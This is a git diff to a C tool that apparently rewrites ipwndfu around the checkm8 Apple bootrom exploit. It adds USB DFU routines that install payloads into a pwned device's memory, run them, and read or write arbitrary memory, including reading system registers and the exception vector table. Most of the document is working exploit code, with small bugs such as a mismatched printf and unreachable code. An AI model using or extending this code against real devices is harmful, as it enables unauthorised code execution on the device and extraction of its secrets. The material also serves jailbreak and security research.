diff --git a/checkm8_payloads/bin/payload_aes.bin b/checkm8_payloads/bin/payload_aes.bin index c3b9faf..257cef2 100644 Binary files a/checkm8_payloads/bin/payload_aes.bin and b/checkm8_payloads/bin/payload_aes.bin differ diff --git a/checkm8_payloads/bin/payload_sysreg.bin b/checkm8_payloads/bin/payload_sysreg.bin index dd64699..8fc742e 100644 Binary files a/checkm8_payloads/bin/payload_sysreg.bin and b/checkm8_payloads/bin/payload_sysreg.bin differ diff --git a/checkm8_payloads/src/sysreg.c b/checkm8_payloads/src/sysreg.c index f375fb5..0d4a225 100644 --- a/checkm8_payloads/src/sysreg.c +++ b/checkm8_payloads/src/sysreg.c @@ -7,11 +7,11 @@ struct sysregs }; TEXT_SECTION -struct sysregs _start() +long long _start() { struct sysregs res; __asm__("mrs %0, ttbr0_el1" : "=r" (res.pt_base)); __asm__("mrs %0, vbar_el1" : "=r" (res.evt_base)); - return res; + return res.evt_base; } \ No newline at end of file diff --git a/checkm8_remote/include/checkm8.h b/checkm8_remote/include/checkm8.h index f1dcc83..ba7cb75 100644 --- a/checkm8_remote/include/checkm8.h +++ b/checkm8_remote/include/checkm8.h @@ -17,6 +17,7 @@ #define DEV_IDVENDOR 0x05AC #define DEV_IDPRODUCT 0x1227 +#define DFU_IMAGE_BASE 0x1800B0000 #else #error "Unspported checkm8 platform" diff --git a/checkm8_remote/include/command.h b/checkm8_remote/include/command.h index 809b6bc..6e99556 100644 --- a/checkm8_remote/include/command.h +++ b/checkm8_remote/include/command.h @@ -3,11 +3,23 @@ #include "checkm8.h" -int dev_memset(struct pwned_device *dev, long addr, unsigned char c, int len); -int dev_memcpy(struct pwned_device *dev, long dest, long src, int len); -int dev_exec(struct pwned_device *dev, int response_len, int nargs, unsigned long long *args); +#define CMD_USB_READ_LIMIT 0xFF0 -int dev_read_memory(struct pwned_device *dev, long addr, long len); -int dev_write_memory(); +struct dev_cmd_resp +{ + int ret; + unsigned long long magic; + unsigned char *data; + int len; +}; + +struct dev_cmd_resp *dev_memset(struct pwned_device *dev, long long addr, unsigned char c, int len); +struct dev_cmd_resp *dev_memcpy(struct pwned_device *dev, long long dest, long long src, int len); +struct dev_cmd_resp *dev_exec(struct pwned_device *dev, int response_len, int nargs, unsigned long long *args); + +struct dev_cmd_resp *dev_read_memory(struct pwned_device *dev, long long addr, int len); +struct dev_cmd_resp *dev_write_memory(struct pwned_device *dev, long long addr, unsigned char *data, int len); + +void free_dev_cmd_resp(struct dev_cmd_resp *resp); #endif //IPWNDFU_REWRITE_C_COMMAND_H diff --git a/checkm8_remote/include/payload.h b/checkm8_remote/include/payload.h index f659a4e..7ecf006 100644 --- a/checkm8_remote/include/payload.h +++ b/checkm8_remote/include/payload.h @@ -6,6 +6,7 @@ #define PAYLOAD_AES_BIN CHECKM8_BIN_BASE "payloads/payload_aes.bin" #define PAYLOAD_SYSREG_BIN CHECKM8_BIN_BASE "payloads/payload_sysreg.bin" #define PAYLOAD_SYNC_BIN CHECKM8_BIN_BASE "payloads/payload_sync.bin" + typedef enum { PAYLOAD_SYNC, @@ -19,9 +20,13 @@ typedef enum DRAM } LOCATION_T; +#define RESP_VALUE(buf, type, i) ((type *) buf)[i] + int install_payload(struct pwned_device *dev, PAYLOAD_T p, LOCATION_T loc); int uninstall_payload(struct pwned_device *dev, PAYLOAD_T p); -int execute_payload(struct pwned_device *dev, PAYLOAD_T p, int nargs, ...); +struct dev_cmd_resp *execute_payload(struct pwned_device *dev, PAYLOAD_T p, int nargs, ...); +struct dev_cmd_resp *read_payload(struct pwned_device *dev, long long addr, int len); +struct dev_cmd_resp *write_payload(struct pwned_device *dev, long long addr, unsigned char *data, int len); #endif //IPWNDFU_REWRITE_C_PAYLOAD_H diff --git a/checkm8_remote/main.c b/checkm8_remote/main.c index 71a3363..1ba9cb6 100644 --- a/checkm8_remote/main.c +++ b/checkm8_remote/main.c @@ -4,6 +4,7 @@ #include #include #include +#include void checkm8_debug_indent(const char *format, ...) { @@ -36,6 +37,7 @@ void checkm8_debug_block(const char *format, ...) int main() { + int ret; struct pwned_device *dev = exploit_device(); if(dev == NULL || dev->status == DEV_NORMAL) { @@ -43,9 +45,24 @@ int main() return -1; } + struct dev_cmd_resp *resp; + install_payload(dev, PAYLOAD_SYNC, DRAM); install_payload(dev, PAYLOAD_SYSREG, DRAM); - execute_payload(dev, PAYLOAD_SYNC, 0); - execute_payload(dev, PAYLOAD_SYSREG, 0); + resp = execute_payload(dev, PAYLOAD_SYNC, 0); + printf("payload sync execution got ret %i\n", resp->ret); + free_dev_cmd_resp(resp); + + resp = execute_payload(dev, PAYLOAD_SYSREG, 0); + if(resp->ret == CHECKM8_SUCCESS) + { + long long evt_base = RESP_VALUE(resp->data, unsigned long long, 0); + printf("got evt base %llx\n", evt_base); + + resp = read_payload(dev, evt_base, 16); + printf("%08llX %08llx %08llx", + RESP_VALUE(resp->data, unsigned long long, 0), + RESP_VALUE(resp->data, unsigned long long, 1)); + } } \ No newline at end of file diff --git a/checkm8_remote/src/command.c b/checkm8_remote/src/command.c index f1145ca..f168355 100644 --- a/checkm8_remote/src/command.c +++ b/checkm8_remote/src/command.c @@ -4,12 +4,19 @@ #include "libusb_helpers.h" #include "libusb.h" -#include "stdlib.h" +#include +#include + +void free_dev_cmd_resp(struct dev_cmd_resp *resp) +{ + if(resp->data != NULL) free(resp->data); + free(resp); +} int dfu_send_data(struct pwned_device *dev, unsigned char *data, long data_len) { checkm8_debug_indent("dfu_send_data(dev = %p, data = %p, data_len = %li)\n", dev, data, data_len); - long index = 0, amount; + long long index = 0, amount; int ret; while(index < data_len) @@ -31,24 +38,36 @@ int dfu_send_data(struct pwned_device *dev, unsigned char *data, long data_len) static unsigned char nullbuf[16] = {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}; -int command(struct pwned_device *dev, - unsigned char *args, int arg_len, - unsigned char *resp, int response_len) +struct dev_cmd_resp *command(struct pwned_device *dev, + unsigned char *args, int arg_len, int response_len) { - checkm8_debug_indent("command(dev = %p, args = %p, arg_len = %i resp = %p, response_len = %i)\n", - dev, args, arg_len, resp, response_len); - if(!is_device_bundle_open(dev)) return CHECKM8_FAIL_NODEV; + checkm8_debug_indent("command(dev = %p, args = %p, arg_len = %i, response_len = %i)\n", + dev, args, arg_len, response_len); + + struct dev_cmd_resp *cmd_resp = calloc(1, sizeof(struct dev_cmd_resp)); + unsigned char resp_buf[response_len]; + + if(!is_device_bundle_open(dev)) + { + cmd_resp->ret = CHECKM8_FAIL_NODEV; + return cmd_resp; + } int ret; ret = dfu_send_data(dev, nullbuf, 16); - if(IS_CHECKM8_FAIL(ret)) return ret; + if(IS_CHECKM8_FAIL(ret)) + { + cmd_resp->ret = ret; + return cmd_resp; + } ret = libusb_control_transfer(dev->bundle->handle, 0x21, 1, 0, 0, nullbuf, 0, 100); if(ret >= 0) checkm8_debug_indent("\ttransferred %i bytes\n", ret); else { checkm8_debug_indent("\trequest failed with error code %i (%s)\n", ret, libusb_error_name(ret)); - return CHECKM8_FAIL_XFER; + cmd_resp->ret = ret; + return cmd_resp; } ret = libusb_control_transfer(dev->bundle->handle, 0xA1, 3, 0, 0, nullbuf, 6, 100); @@ -56,7 +75,8 @@ int command(struct pwned_device *dev, else { checkm8_debug_indent("\trequest failed with error code %i (%s)\n", ret, libusb_error_name(ret)); - return CHECKM8_FAIL_XFER; + cmd_resp->ret = ret; + return cmd_resp; } ret = libusb_control_transfer(dev->bundle->handle, 0xA1, 3, 0, 0, nullbuf, 6, 100); @@ -64,40 +84,57 @@ int command(struct pwned_device *dev, else { checkm8_debug_indent("\trequest failed with error code %i (%s)\n", ret, libusb_error_name(ret)); - return CHECKM8_FAIL_XFER; + cmd_resp->ret = ret; + return cmd_resp; } ret = dfu_send_data(dev, args, arg_len); - if(IS_CHECKM8_FAIL(ret)) return ret; + if(IS_CHECKM8_FAIL(ret)) + { + cmd_resp->ret = ret; + return cmd_resp; + } if(response_len == 0) { ret = libusb_control_transfer(dev->bundle->handle, 0xA1, 2, 0xFFFF, 0, - resp, response_len + 1, + resp_buf, response_len + 1, 100); if(ret >= 0) checkm8_debug_indent("\tfinal request transferred %i bytes\n", ret); else { checkm8_debug_indent("\tfinal request failed with error code %i (%s)\n", ret, libusb_error_name(ret)); - return CHECKM8_FAIL_XFER; + cmd_resp->ret = ret; + return cmd_resp; } } else { ret = libusb_control_transfer(dev->bundle->handle, 0xA1, 2, 0xFFFF, 0, - resp, response_len, + resp_buf, response_len, 100); if(ret >= 0) checkm8_debug_indent("\tfinal request transferred %i bytes\n", ret); else { checkm8_debug_indent("\tfinal request failed with error code %i (%s)\n", ret, libusb_error_name(ret)); - return CHECKM8_FAIL_XFER; + cmd_resp->ret = ret; + return cmd_resp; } } - return CHECKM8_SUCCESS; + cmd_resp->ret = CHECKM8_SUCCESS; + memcpy(&cmd_resp->magic, resp_buf, 8); + if(response_len - 8 > 0) + { + checkm8_debug_indent("\tcopying %i bytes of output to response data section\n", response_len - 8); + cmd_resp->data = calloc(1, response_len - 8); + memcpy(cmd_resp->data, &resp_buf[8], response_len - 8); + } + + cmd_resp->len = response_len - 8; + return cmd_resp; } #define EXEC_MAGIC 0x6578656365786563ul // 'execexec'[::-1] @@ -105,7 +142,7 @@ int command(struct pwned_device *dev, #define MEMS_MAGIC 0x6d656d736d656d73ul // 'memsmems'[::-1] #define DONE_MAGIC 0x646f6e65646f6e65ul // 'donedone'[::-1] -int dev_memset(struct pwned_device *dev, long addr, unsigned char c, int len) +struct dev_cmd_resp *dev_memset(struct pwned_device *dev, long long addr, unsigned char c, int len) { checkm8_debug_indent("dev_memset(dev = %p, addr = %lx, c = %x, len = %li)\n", dev, addr, c, len); unsigned long long cmd_args[5]; @@ -115,13 +152,10 @@ int dev_memset(struct pwned_device *dev, long addr, unsigned char c, int len) cmd_args[3] = (unsigned long long) c; cmd_args[4] = len; - unsigned long long cmd_resp; - return command(dev, - (unsigned char *) &cmd_args, 5 * sizeof(unsigned long long), - (unsigned char *) &cmd_resp, 1 * sizeof(unsigned long long)); + return command(dev, (unsigned char *) &cmd_args, 5 * sizeof(unsigned long long), 1 * sizeof(unsigned long long)); } -int dev_memcpy(struct pwned_device *dev, long dest, long src, int len) +struct dev_cmd_resp *dev_memcpy(struct pwned_device *dev, long long dest, long long src, int len) { checkm8_debug_indent("dev_memset(dev = %p, dest = %lx, src = %lx, len = %li)\n", dev, dest, src, len); unsigned long long cmd_args[5]; @@ -131,28 +165,17 @@ int dev_memcpy(struct pwned_device *dev, long dest, long src, int len) cmd_args[3] = src; cmd_args[4] = len; - unsigned long long cmd_resp; - return command(dev, - (unsigned char *) &cmd_args, 5 * sizeof(unsigned long long), - (unsigned char *) &cmd_resp, 1 * sizeof(unsigned long long)); + return command(dev, (unsigned char *) &cmd_args, 5 * sizeof(unsigned long long), 1 * sizeof(unsigned long long)); } -int dev_exec(struct pwned_device *dev, int response_len, int nargs, unsigned long long *args) +struct dev_cmd_resp *dev_exec(struct pwned_device *dev, int response_len, int nargs, unsigned long long *args) { - checkm8_debug_indent("dev_exec(dev = %p, response_len = %lu, nargs = %i, args = %p\n", dev, response_len, nargs, - args); - if(nargs > 7) - { - checkm8_debug_indent("\ttoo many args\n"); - return CHECKM8_FAIL_INVARGS; - } + checkm8_debug_indent("dev_exec(dev = %p, response_len = %lu, nargs = %i, args = %p\n", dev, response_len, nargs, args); - int ret, i; + int i; unsigned long long *argbase; - checkm8_debug_indent("\tcopying args\n"); - unsigned long long cmd_args[1 + nargs]; - unsigned long long cmd_resp[1 + response_len]; + checkm8_debug_indent("\tcopying args\n"); cmd_args[0] = EXEC_MAGIC; cmd_args[1] = 0; @@ -163,14 +186,69 @@ int dev_exec(struct pwned_device *dev, int response_len, int nargs, unsigned lon checkm8_debug_indent("\t\t0x%lx (0d%li) (%s)\n", args[i], args[i], (char *) &args[i]); } - ret = command(dev, - (unsigned char *) cmd_args, (1 + nargs) * sizeof(unsigned long long), - (unsigned char *) cmd_resp, 16 + 8 * response_len); + return command(dev, (unsigned char *) cmd_args, (1 + nargs) * sizeof(unsigned long long), 16 + response_len); +} - if(ret == CHECKM8_SUCCESS && ((unsigned long *) cmd_resp)[0] != DONE_MAGIC) return CHECKM8_FAIL_NOTDONE; - else +struct dev_cmd_resp *dev_read_memory(struct pwned_device *dev, long long addr, int len) +{ + checkm8_debug_indent("dev_read_memory(dev = %p, addr = %lx, len = %i)\n", dev, addr, len); + long long index = 0, amount; + + unsigned long long cmd_args[5]; + struct dev_cmd_resp *resp, *ret = calloc(1, sizeof(struct dev_cmd_resp)); + ret->data = calloc(1, len); + + while(index < len) { - checkm8_debug_indent("\tgot retval %lX\n", cmd_resp[1]); - return ret; + if(len - index >= CMD_USB_READ_LIMIT - 16) amount = CMD_USB_READ_LIMIT - 16; + else amount = len - index; + + checkm8_debug_indent("\treading chunk of size %li at index %li\n", amount, index); + cmd_args[0] = MEMC_MAGIC; + cmd_args[1] = 0; + cmd_args[2] = DFU_IMAGE_BASE + 16; + cmd_args[3] = addr + index; + cmd_args[4] = amount; + + resp = command(dev, (unsigned char *) &cmd_args, 5 * sizeof(unsigned long long), 16 + amount); + ret->ret = resp->ret; + + if(IS_CHECKM8_FAIL(resp->ret)) + { + checkm8_debug_indent("\tlast transfer failed, aborting\n"); + free_dev_cmd_resp(resp); + free(ret->data); + ret->data = NULL; + return ret; + } + else + { + checkm8_debug_indent("\tsuccessfully copied chunk\n"); + memcpy(&ret->data[index], &resp->data[8], amount); + free_dev_cmd_resp(resp); + } + + index += amount; } + + ret->magic = DONE_MAGIC; + ret->len = len; + return ret; +} + +struct dev_cmd_resp *dev_write_memory(struct pwned_device *dev, long long addr, unsigned char *data, int len) +{ + checkm8_debug_indent("dev_write_memory(dev = %p, addr = %lx, data = %p, len = %i)\n", dev, addr, data, len); + + unsigned char cmd_args[40 + len]; + ((unsigned long *) cmd_args)[0] = MEMC_MAGIC; + ((unsigned long *) cmd_args)[1] = 0; + ((unsigned long *) cmd_args)[2] = addr; + ((unsigned long *) cmd_args)[3] = DFU_IMAGE_BASE + 40; + ((unsigned long *) cmd_args)[4] = len; + memcpy(&cmd_args[40], data, len); + + return command(dev, (unsigned char *) &cmd_args, 40 + len, 1 * sizeof(unsigned long long)); + + return dev_memcpy(dev, addr, DFU_IMAGE_BASE + 40, len); } \ No newline at end of file diff --git a/checkm8_remote/src/payload.c b/checkm8_remote/src/payload.c index 281a6ab..159c169 100644 --- a/checkm8_remote/src/payload.c +++ b/checkm8_remote/src/payload.c @@ -12,7 +12,7 @@ struct payload { PAYLOAD_T type; unsigned char *data; - long len; + int len; long long install_base; struct payload *next; @@ -76,6 +76,7 @@ void free_payload(struct payload *p) long long curr_address = 0x180150000; long long get_address(struct pwned_device *dev, LOCATION_T l) { + //TODO: make an actual memory allocator long long ret = curr_address; curr_address += 0x1000; return ret; @@ -131,6 +132,7 @@ int install_payload(struct pwned_device *dev, PAYLOAD_T p, LOCATION_T loc) { checkm8_debug_indent("install_payload(dev = %p, p = %i, loc = %i)\n", dev, p, loc); int i, ret; + struct dev_cmd_resp *resp = NULL; struct payload *pl = get_payload(p); long long addr = get_address(dev, loc); @@ -139,42 +141,50 @@ int install_payload(struct pwned_device *dev, PAYLOAD_T p, LOCATION_T loc) ret = get_device_bundle(dev); if(IS_CHECKM8_FAIL(ret)) return ret; - for(i = 0; i < pl->len; i++) + resp = dev_write_memory(dev, addr, pl->data, pl->len); + if(IS_CHECKM8_FAIL(resp->ret)) { - checkm8_debug_indent("\tcopying payload byte %i of %i\n", i, pl->len); - ret = dev_memset(dev, addr + i, pl->data[i], 1); - if(IS_CHECKM8_FAIL(ret)) - { - release_device_bundle(dev); - return CHECKM8_FAIL_XFER; - } + free_dev_cmd_resp(resp); + release_device_bundle(dev); + return CHECKM8_FAIL_XFER; } - checkm8_debug_indent("\tdone copying and linking payload"); + checkm8_debug_indent("\tdone copying and linking payload\n"); pl->install_base = addr; dev_link_payload(dev, pl); + + free_dev_cmd_resp(resp); release_device_bundle(dev); return ret; } int uninstall_payload(struct pwned_device *dev, PAYLOAD_T p) { - + //TODO: free memory in memory allocator } -int execute_payload(struct pwned_device *dev, PAYLOAD_T p, int nargs, ...) +struct dev_cmd_resp *execute_payload(struct pwned_device *dev, PAYLOAD_T p, int nargs, ...) { checkm8_debug_indent("execute_payload(dev = %p, p = %i, nargs = %i, ...)\n", dev, p, nargs); int ret, i; + struct dev_cmd_resp *resp; struct payload *pl; + if((pl = dev_retrieve_payload(dev, p)) == NULL) { checkm8_debug_indent("\tpayload is not installed\n"); - return CHECKM8_FAIL_NOINST; + resp = calloc(1, sizeof(struct dev_cmd_resp)); + resp->ret = CHECKM8_FAIL_NOINST; + return resp; } ret = get_device_bundle(dev); - if(IS_CHECKM8_FAIL(ret)) return ret; + if(IS_CHECKM8_FAIL(ret)) + { + resp = calloc(1, sizeof(struct dev_cmd_resp)); + resp->ret = ret; + return resp; + } unsigned long long args[nargs + 1]; args[0] = pl->install_base; @@ -189,7 +199,43 @@ int execute_payload(struct pwned_device *dev, PAYLOAD_T p, int nargs, ...) } va_end(arg_list); - ret = dev_exec(dev, 2, nargs + 1, args); + resp = dev_exec(dev, 8, nargs + 1, args); release_device_bundle(dev); - return ret; -} \ No newline at end of file + return resp; +} + +struct dev_cmd_resp *read_payload(struct pwned_device *dev, long long addr, int len) +{ + int ret; + struct dev_cmd_resp *resp; + + ret = get_device_bundle(dev); + if(IS_CHECKM8_FAIL(ret)) + { + resp = calloc(1, sizeof(struct dev_cmd_resp)); + resp->ret = ret; + return resp; + } + + resp = dev_read_memory(dev, addr, len); + release_device_bundle(dev); + return resp; +} + +struct dev_cmd_resp *write_payload(struct pwned_device *dev, long long addr, unsigned char *data, int len) +{ + int ret; + struct dev_cmd_resp *resp; + + ret = get_device_bundle(dev); + if(IS_CHECKM8_FAIL(ret)) + { + resp = calloc(1, sizeof(struct dev_cmd_resp)); + resp->ret = ret; + return resp; + } + + resp = dev_write_memory(dev, addr, data, len); + release_device_bundle(dev); + return resp; +}